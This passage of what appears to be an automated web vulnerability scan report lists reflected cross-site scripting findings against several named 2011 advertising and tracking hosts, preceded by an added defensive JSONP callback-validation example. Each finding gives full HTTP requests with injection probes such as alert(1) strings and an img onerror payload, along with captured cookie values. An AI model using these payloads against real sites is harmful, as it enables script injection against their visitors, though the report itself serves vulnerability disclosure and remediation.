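The callback reflections in 2.50, 2.51, 2.62 and 2.64, and the values reflected inside JSONP bodies in 2.48, 2.49 and 2.52, share one root cause: the endpoint assembles a script from request parameters without constraining the callback name or pinning the response's MIME type. The following is an added example written for this page, not code from bit.ly, Collarity, TweetMeme, Vibrant Media or this report; the function names, the 64-character callback limit, the 400 response shape and the sample callback strings are assumptions. It shows a JSONP response builder that rejects anything but a dotted identifier as the callback, escapes the JSON payload for a script context, and sends Content-Type plus X-Content-Type-Options: nosniff so a directly opened URL cannot be sniffed into an HTML document, together with a small triage helper that classifies the Content-Type values seen in these findings.

```javascript
// Added example for this page; not code from any service named in the report.
// Function names, limits and sample strings below are assumptions.

// A callback may only be a dotted chain of JavaScript identifiers, such as
// "CLPH.handleUUID" or "$iTXT.js.callback1". Angle brackets, ";", "//" and
// whitespace all fail the pattern and the request is refused instead of reflected.
const CALLBACK_RE = /^[A-Za-z_$][\w$]*(?:\.[A-Za-z_$][\w$]*)*$/;
const MAX_CALLBACK_LEN = 64; // assumed limit; long enough for any real handler name

function isSafeCallbackName(name) {
  return typeof name === 'string' &&
    name.length <= MAX_CALLBACK_LEN &&
    CALLBACK_RE.test(name);
}

// JSON that is safe to embed in a script body: "<", ">" and "&" are \u-escaped so the
// output can never contain "</script>", and U+2028/U+2029 are escaped because JSON
// allows them raw while JavaScript parses them as line terminators. JSON.parse on the
// result still yields the original value.
function jsonForScript(value) {
  return JSON.stringify(value).replace(/[<>&\u2028\u2029]/g, (ch) =>
    '\\u' + ch.charCodeAt(0).toString(16).padStart(4, '0'));
}

// Builds the complete HTTP response for a JSONP request. A rejected callback never
// reaches the body, and the headers pin the MIME type so that a browser which opens
// the URL directly cannot sniff the body into an HTML document.
function buildJsonpResponse(callback, payload) {
  const headers = {
    'Content-Type': 'application/javascript; charset=utf-8',
    'X-Content-Type-Options': 'nosniff',
    'Cache-Control': 'no-store',
  };
  if (!isSafeCallbackName(callback)) {
    return {
      status: 400,
      headers: { ...headers, 'Content-Type': 'application/json; charset=utf-8' },
      body: JSON.stringify({ error: 'invalid callback name' }), // nothing reflected
    };
  }
  // The leading comment keeps the body from starting with attacker-chosen bytes;
  // the trailing ";" keeps the statement well-formed if the body is concatenated.
  return {
    status: 200,
    headers,
    body: `/**/${callback}(${jsonForScript(payload)});`,
  };
}

// Triage helper for findings like the ones above: decides whether a tag reflected in
// the body would be handed to the HTML parser on direct navigation. A missing
// Content-Type leaves the decision to browser sniffing and is treated as HTML-capable.
function reflectionRendersAsHtml(contentType) {
  if (!contentType) return true;
  return /^\s*text\/html\b/i.test(contentType);
}
```

Run with node. The triage helper reproduces why 2.51 and 2.52 (text/html) fire on direct navigation while 2.50 (text/javascript) only matters when the response is executed as script, and why the absent Content-Type in 2.49 should be treated as HTML-capable until tested in the target browser.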

2.63. http://courier-journal.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://courier-journal.us.intellitxt.com
Path:   /intellitxt/front.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 29370'-alert(1)-'92fd6a1d6eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /intellitxt/front.asp?ipid=10323&29370'-alert(1)-'92fd6a1d6eb=1 HTTP/1.1
Host: courier-journal.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.courier-journal.com/article/20110509/FEATURES07/305090030/Monday-s-TV-Talk-Show-Lineup?odyssey=mod%7Cnewswell%7Ctext%7CHome%7Cs
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX=AQAAAAQAAArJAQAAAAEAAAEvki9eGgAACucBAAAAAQAAAS+SL14aAAAK1QEAAAABAAABL5IvXhoAAArHAQAAAAEAAAEvki9eGgAAAAD9SQn+; VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7OwIAAAEv1X7mIwA-

Response

HTTP/1.1 200 OK
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7OwMAAAEv1YBF2wA-; Domain=.intellitxt.com; Expires=Fri, 08-Jul-2011 16:04:04 GMT; Path=/
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7OwMAAAEv1YBF2wA-; Domain=.intellitxt.com; Expires=Fri, 08-Jul-2011 16:04:04 GMT; Path=/
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Mon, 09 May 2011 16:04:04 GMT
Age: 0
Connection: keep-alive
Content-Length: 11740

document.itxtDisabled=1;
document.itxtDebugOn=false;
if(document.itxtDisabled){
document.itxtInProg=1;
if ('undefined'== typeof $iTXT){$iTXT={};};if (!$iTXT.cnst){$iTXT.cnst={};} if (!$iTXT.debug){$iT
...[SNIP]...
l,ask,live,bing",
'ids.aol':"10",
'fields.aol':"query,as_q,q",
'fields.ask':"q",
'fields.google':"q,as_q"};
$iTXT.js.serverUrl='http://courier-journal.us.intellitxt.com';$iTXT.js.pageQuery='ipid=10323&29370'-alert(1)-'92fd6a1d6eb=1';$iTXT.js.umat=true;$iTXT.js.startTime=(new Date()).getTime();if (document.itxtIsReady) {document.itxtLoadLibraries();};
}

2.64. http://courier-journal.us.intellitxt.com/v4/init [jscallback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://courier-journal.us.intellitxt.com
Path:   /v4/init

Issue detail

The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks: it is emitted as the bare name of the function the response invokes (a JSONP-style callback) inside a try block. The payload 952ab%3balert(1)//326c748cb10 was submitted in the jscallback parameter. This input was echoed as 952ab;alert(1)//326c748cb10 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response: the semicolon ends the callback reference as a statement of its own and alert(1) follows as a second statement. Note that the trailing // also comments out the closing }catch(e){} on the same line, so unless a line break follows in the full response the script will fail to parse and nothing executes; a manual retest should use a payload that leaves the try block balanced rather than relying on this exact probe.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Here the jscallback value is used as a function name, so string encoding does not apply: the value should be validated against a strict allowlist of identifier characters (letters, digits, underscore, $ and dots) and rejected otherwise, and the response should be served with a JavaScript Content-Type plus X-Content-Type-Options: nosniff so that no browser renders it as HTML.

Request

GET /v4/init?ts=1304957022412&pagecl=32105&fv=10&muid=&refurl=http%3A%2F%2Fwww.courier-journal.com%2Farticle%2F20110509%2FFEATURES07%2F305090030%2FMonday-s-TV-Talk-Show-Lineup%3Fodyssey%3Dmod%257Cnewswell%257Ctext%257CHome%257Cs&ipid=10323&jscallback=$iTXT.js.callback0952ab%3balert(1)//326c748cb10 HTTP/1.1
Host: courier-journal.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.courier-journal.com/article/20110509/FEATURES07/305090030/Monday-s-TV-Talk-Show-Lineup?odyssey=mod%7Cnewswell%7Ctext%7CHome%7Cs
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX=AQAAAAQAAArJAQAAAAEAAAEvki9eGgAACucBAAAAAQAAAS+SL14aAAAK1QEAAAABAAABL5IvXhoAAArHAQAAAAEAAAEvki9eGgAAAAD9SQn+; VM_USR="AArNPECOHUvQr+aEbt9FOpIAADrpAAA7OwMAAAEv1X/pTgA-"

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Mon, 09 May 2011 16:05:26 GMT
Age: 0
Connection: keep-alive
Content-Length: 6757

var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h
...[SNIP]...
et('initskip',1);$iTXT.data.Context.params.set('minimagew',180);$iTXT.data.Context.params.set('minimageh',200);$iTXT.data.Context.params.set('intattrs','alt,title,href,src,name');try{$iTXT.js.callback0952ab;alert(1)//326c748cb10({"requiresContextualization":1,"requiresAdverts":1,"chunkKey":"10323:5df8b1e5a4074f05fec4903c8d524558:0ACD3C408E1D4BD0AFE6846EDF453A92:"});}catch(e){}

2.65. http://courier-journal.us.intellitxt.com/v4/init [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://courier-journal.us.intellitxt.com
Path:   /v4/init

Issue detail

The name of an arbitrarily supplied request parameter is copied, as a property name of the object literal passed to $iTXT.glob.dbgParams.set(...), into a JavaScript string which is encapsulated in double quotation marks. The payload 1d9b9"-alert(1)-"1a55f6daf1d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This shows that the parameter name reaches the script unencoded, and that a double quote in it closes the property-name string. As reflected, the probe sits in an object-literal key position, where "1d9b9"-alert(1)-"1a55f6daf1d" is a syntax error rather than an executed expression, so this exact payload does not run; a manual retest needs a payload that keeps the object literal syntactically valid. The same object also reflects the request's User-Agent header value and IP-derived geodata (dma, POSTCODE); whether the header is encoded was not tested here and is worth checking, although a request header is not controllable from a cross-site link.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Object keys derived from request parameter names should either be produced by a JSON encoder or, better, be restricted to an allowlist of the parameter names the application actually expects before anything is echoed.

Request

GET /v4/init?ts=1304957022412&pagecl=32105&fv=10&muid=&refurl=http%3A%2F%2Fwww.courier-journal.com%2Farticle%2F20110509%2FFEATURES07%2F305090030%2FMonday-s-TV-Talk-Show-Lineup%3Fodyssey%3Dmod%257Cnewswell%257Ctext%257CHome%257Cs&ipid=10323&jscallback=$iTXT.js.callback0&1d9b9"-alert(1)-"1a55f6daf1d=1 HTTP/1.1
Host: courier-journal.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.courier-journal.com/article/20110509/FEATURES07/305090030/Monday-s-TV-Talk-Show-Lineup?odyssey=mod%7Cnewswell%7Ctext%7CHome%7Cs
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX=AQAAAAQAAArJAQAAAAEAAAEvki9eGgAACucBAAAAAQAAAS+SL14aAAAK1QEAAAABAAABL5IvXhoAAArHAQAAAAEAAAEvki9eGgAAAAD9SQn+; VM_USR="AArNPECOHUvQr+aEbt9FOpIAADrpAAA7OwMAAAEv1X/pTgA-"

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Mon, 09 May 2011 16:05:31 GMT
Age: 0
Connection: keep-alive
Content-Length: 6738

var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h
...[SNIP]...
10);var undefined;if(null==$iTXT.glob.dbgParams||undefined==$iTXT.glob.dbgParams){$iTXT.glob.dbgParams=new $iTXT.data.Param($iTXT.glob.dbParams,undefined,undefined,'DEBUG');}$iTXT.glob.dbgParams.set({"1d9b9"-alert(1)-"1a55f6daf1d":"1","pagecl":"32105","fv":"10","ts":"1304957022412","dma":623,"POSTCODE":"75207","user-agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534
...[SNIP]...

2.66. http://feed-rt.baronsoffers.com/offer/feed/q/aT0xNDA5LHM9MzAweDI1MCxuPWlmcmFtZSxiPTA= [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://feed-rt.baronsoffers.com
Path:   /offer/feed/q/aT0xNDA5LHM9MzAweDI1MCxuPWlmcmFtZSxiPTA=

Issue detail

The value of REST URL parameter 1 (the first path segment, which the application routes as the controller name) is copied into the HTML document as plain text between tags, inside the framework's error page ("Invalid controller specified (...)"). The payload 6a929<a>0a36187bda8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful; only the <a> probe was tried for this segment, while 2.68 and 2.69 show the same error page executing an <img onerror> payload from other segments, so a manual retest with an event-handler payload is warranted. The response also advertises the stack in use (X-Powered-By: PHP/5.3.3 ZendServer/5.0) and is a debug-style error page; production deployments should return a generic error page that does not echo the request.

Request

GET /offer6a929<a>0a36187bda8/feed/q/aT0xNDA5LHM9MzAweDI1MCxuPWlmcmFtZSxiPTA=?subid=default HTTP/1.1
Host: feed-rt.baronsoffers.com
Proxy-Connection: keep-alive
Referer: http://www.latimes.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 09 May 2011 16:02:35 GMT
Server: Apache
X-Powered-By: PHP/5.3.3 ZendServer/5.0
P3P: policyref="http://feed-rt.baronsoffers.com/w3c/p3p.xml", CP="ALL BUS LEG DSP COR ADM CUR DEV PSA OUR NAV INT"
Content-Length: 1446
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Error</title>


</head>
<body>

   <div id="container-content">

...[SNIP]...
</b> Invalid controller specified (offer6a929<a>0a36187bda8)</p>
...[SNIP]...

2.67. http://feed-rt.baronsoffers.com/offer/feed/q/aT0xNDA5LHM9MzAweDI1MCxuPWlmcmFtZSxiPTA= [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://feed-rt.baronsoffers.com
Path:   /offer/feed/q/aT0xNDA5LHM9MzAweDI1MCxuPWlmcmFtZSxiPTA=

Issue detail

The value of REST URL parameter 2 (the second path segment, routed as the action name) is copied into the HTML document as plain text between tags: the 404 page dumps the routing parameters inside a <pre> block, and the action name appears there. The payload 3fd56<a>0305c79b333 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. The same <pre> dump is shown executing an <img onerror> payload in 2.68 and 2.69, so the unencoded sink is confirmed; the 404 handler should not expose a parameter dump at all, and whatever it does render must be HTML-encoded.

Request

GET /offer/feed3fd56<a>0305c79b333/q/aT0xNDA5LHM9MzAweDI1MCxuPWlmcmFtZSxiPTA=?subid=default HTTP/1.1
Host: feed-rt.baronsoffers.com
Proxy-Connection: keep-alive
Referer: http://www.latimes.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 09 May 2011 16:02:37 GMT
Server: Apache
X-Powered-By: PHP/5.3.3 ZendServer/5.0
P3P: policyref="http://feed-rt.baronsoffers.com/w3c/p3p.xml", CP="ALL BUS LEG DSP COR ADM CUR DEV PSA OUR NAV INT"
Set-Cookie: ipinfo=173.193.214.243%7C2915161843%7CUS%7C; expires=Mon, 16-May-2011 16:02:37 GMT; path=/; domain=.baronsoffers.com
Content-Length: 1756
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Error</title>


</head>
<body>

   <div id="container-content">

...[SNIP]...
<pre>array(5) {
["controller"]=>
string(5) "offer"
["action"]=>
string(23) "feed3fd56<a>0305c79b333"
["q"]=>
...[SNIP]...

2.68. http://feed-rt.baronsoffers.com/offer/feed/q/aT0xNDA5LHM9MzAweDI1MCxuPWlmcmFtZSxiPTA= [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://feed-rt.baronsoffers.com
Path:   /offer/feed/q/aT0xNDA5LHM9MzAweDI1MCxuPWlmcmFtZSxiPTA=

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags: it becomes a key in the dump of routing parameters that the error page prints inside <pre>. The payload c3e53<img%20src%3da%20onerror%3dalert(1)>033dd735ca1 was submitted in the REST URL parameter 3. This input was echoed as c3e53<img src=a onerror=alert(1)>033dd735ca1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document. The response is a 500 Internal Server Error, but it is served as text/html and rendered normally, so the status code does not mitigate the injection.

Request

GET /offer/feed/qc3e53<img%20src%3da%20onerror%3dalert(1)>033dd735ca1/aT0xNDA5LHM9MzAweDI1MCxuPWlmcmFtZSxiPTA=?subid=default HTTP/1.1
Host: feed-rt.baronsoffers.com
Proxy-Connection: keep-alive
Referer: http://www.latimes.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 09 May 2011 16:02:40 GMT
Server: Apache
X-Powered-By: PHP/5.3.3 ZendServer/5.0
P3P: policyref="http://feed-rt.baronsoffers.com/w3c/p3p.xml", CP="ALL BUS LEG DSP COR ADM CUR DEV PSA OUR NAV INT"
Content-Length: 1748
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Error</title>


</head>
<body>

   <div id="container-content">

...[SNIP]...
<pre>array(5) {
["controller"]=>
string(5) "offer"
["action"]=>
string(4) "feed"
["qc3e53<img src=a onerror=alert(1)>033dd735ca1"]=>
...[SNIP]...

2.69. http://feed-rt.baronsoffers.com/offer/feed/q/aT0xNDA5LHM9MzAweDI1MCxuPWlmcmFtZSxiPTA= [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://feed-rt.baronsoffers.com
Path:   /offer/feed/q/aT0xNDA5LHM9MzAweDI1MCxuPWlmcmFtZSxiPTA=

Issue detail

The value of REST URL parameter 4 (the base64-looking value of the q segment) is copied into the HTML document as plain text between tags: it is printed as a value in the routing-parameter dump inside <pre>. The payload c875d<img%20src%3da%20onerror%3dalert(1)>aa0bd57f800 was submitted in the REST URL parameter 4. This input was echoed as c875d<img src=a onerror=alert(1)>aa0bd57f800 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document. As in 2.68, the 500 status does not matter: the body is text/html and is rendered.

Request

GET /offer/feed/q/c875d<img%20src%3da%20onerror%3dalert(1)>aa0bd57f800=?subid=default HTTP/1.1
Host: feed-rt.baronsoffers.com
Proxy-Connection: keep-alive
Referer: http://www.latimes.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 09 May 2011 16:02:41 GMT
Server: Apache
X-Powered-By: PHP/5.3.3 ZendServer/5.0
P3P: policyref="http://feed-rt.baronsoffers.com/w3c/p3p.xml", CP="ALL BUS LEG DSP COR ADM CUR DEV PSA OUR NAV INT"
Content-Length: 1709
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Error</title>


</head>
<body>

   <div id="container-content">

...[SNIP]...
<pre>array(5) {
["controller"]=>
string(5) "offer"
["action"]=>
string(4) "feed"
["q"]=>
string(45) "c875d<img src=a onerror=alert(1)>aa0bd57f800="
["module"]=>
...[SNIP]...

2.70. http://js.revsci.net/gateway/gw.js [csid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the body of the JavaScript include the endpoint returns (Content-Type application/javascript), inside a /* ... */ block comment, after being folded to upper case. The payload fe24b<script>alert(1)</script>8757376e56b was submitted in the csid parameter. This input was echoed as FE24B<SCRIPT>ALERT(1)</SCRIPT>8757376E56B in the application's response.

As served, this reflection does not execute: a browser does not render an application/javascript response as HTML, the block comment swallows the text when the file is loaded as a script, and the case folding turns alert into ALERT, which JavaScript treats as a different, undefined name. The scanner's "Certain" rating records an unencoded echo, not a working injection; treat this as a candidate for manual review (whether the comment can be closed from the parameter, and whether any caller places the response in an HTML context) rather than a confirmed XSS.

Request

GET /gateway/gw.js?csid=B08725fe24b<script>alert(1)</script>8757376e56b HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.latimes.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4decdd55&1&10011&4dc75936&271d956a153787d6fee9112e9c6a9326; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4decf45e&6&10124,10098,10078,10053,10100,10143&4dc74a5e&271d956a153787d6fee9112e9c6a9326; rtc_4-db=...[SNIP]...; rsi_segs_1000000=...[SNIP]...; udm_0=...[SNIP]...; rsiPus_iGvR="...[SNIP]..."; 
rsi_us_1000000="pUMtIzlHMAYY1A3HkAz1jwtCTPvDvwQSU2eqPpzA6n4Wsm7TKYqfaBLrtKN68iFx8cqmHSK9eaFvyn1GBw+6xVpybHLaiq5FNZQFDVoCY880WC0bwmZ90V4ndE/SeN3B//stcmtll9Cg/ISKIvC6VZ9/POM8ONIILZmvPLG376XaN6IBlBj/HtaMxNqIHz6RpUXcFR6WQO/hKPe5ykaB4XpD8EiZoXxqsH6BnryjdDb/DZlpOBy7SHfLoJZ1hUMVAkby1CeDLhxWGwNF/Xo0wHrVXi3lQiad3uaxZC5CQwXl0UftlAYrM2Cf7Bq0Q71leNaXmYXCgsp58puMyYKOhpIyYy8rIczaKbL7xSxVWV5pyjTCpwl5khZbXqy3cl9aPSiblyFVUzoTNdDbP/Ufwaf5WxejCp2AYvYSAW1YISPXUfQIPkHLqOHgzL1Ycy+O2Tmj7NZC58RawGVEJyd+ZCovBKgFCQm7YqMYAiRBdcbVK1GyI7Kw8tiOs0erpnIilKw6JJ3ZGnP3lU7HzdrglwGlxfvR+i6XUlKbq9lMO+OvTy0Pcq8+TXMiy6SxCtVj0c9iVhgTav+qok/isEHRdALDF8Qc97MCaA5xhIof2nth2l8UJ7TzAZj633oH3fd1GDzCmvqoctSZ91Z+rQoLRnFNEaqq8M7RcRYtz62KTrVXBKwLyXioap9Dw7pICla4/bAo5SrutPrAfFFfUxRrihk3ZXQijldc8xotPMoQVq761R9i+mrzLwL0gE0tBVsImrybLZ7cq+QyYtg4YvKXUPEntPGj24XXFKvcdyEH0pys/E8pLx9zGCMAdo35gx6qg0EhW8z75pbR8o8aCEAgT4Ks9CAoGJE3Ej/dqvUUtXxeqgQ5ujM6Ql1mCM6/Qwxxvl0q9cZVDajvuH8CXXCwpRLVa+OCcXuBpI3Bzv1cBc743BUSdU0eMjMbkXv3VEDeAbmyxTziyoDjEfObahoaldHBm2FbkZAHWmWwcKoZMmsbafkBXNOwclU0cnawmcbz2uCqNX+tEkZyOVrKbOoDmk64AL9/i3A2DensXHKtxGg07Z04wZ/yzrKGKC0RZO8bJ0jDdXyjLCiuq4J5GNwVsEb60G9XHvEbzJtPEuIT6PBoLbGHsUcwbni34ugzA8tfeM7fmvZ95A7VVr34Ny83LTdjBOkGEjN49+ldxTHLbURKZQWpolAYtQK/I4zWM7TOmF15H/7IsxoGNtVOM7QD1+1vTo7QC9pEJ81x/3oSS1gv0+Uet9qOR1Ylglrlv8PJN8hqyhDwLX7uMP5C7O0NcKiwhuSVlsNUmf2oxUpkBlLNAIxxMTmoJPaHme5N7YGTl/+XWRoMBFcHq91a1o7+D3pERBQ1X8IWCUcdM/qNxu6dpx6mAko95U1I3nyf45XbvXv6Zo3KdRcK3M4r6F4+NPLgcrtUhjeR3iecAtiLwa7Z4JxfNiwAloqO2F4stPq4AfAW32Ytrts5pDN36oeWhZuFxPPC2Eits+S5bYSisliCOgfUnVwjGrLxhliGakbLW0E6210628qa+qhedum8DghgMpNap5FGZDB5GcG7bnf3AK5f89e7BTZcDQnkmbDTfaYVj/2tuUCsD/E="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 09 May 2011 16:02:39 GMT
Cache-Control: max-age=86400, private
Expires: Tue, 10 May 2011 16:02:39 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 09 May 2011 16:02:39 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "B08725FE24B<SCRIPT>ALERT(1)</SCRIPT>8757376E56B" was not recognized.
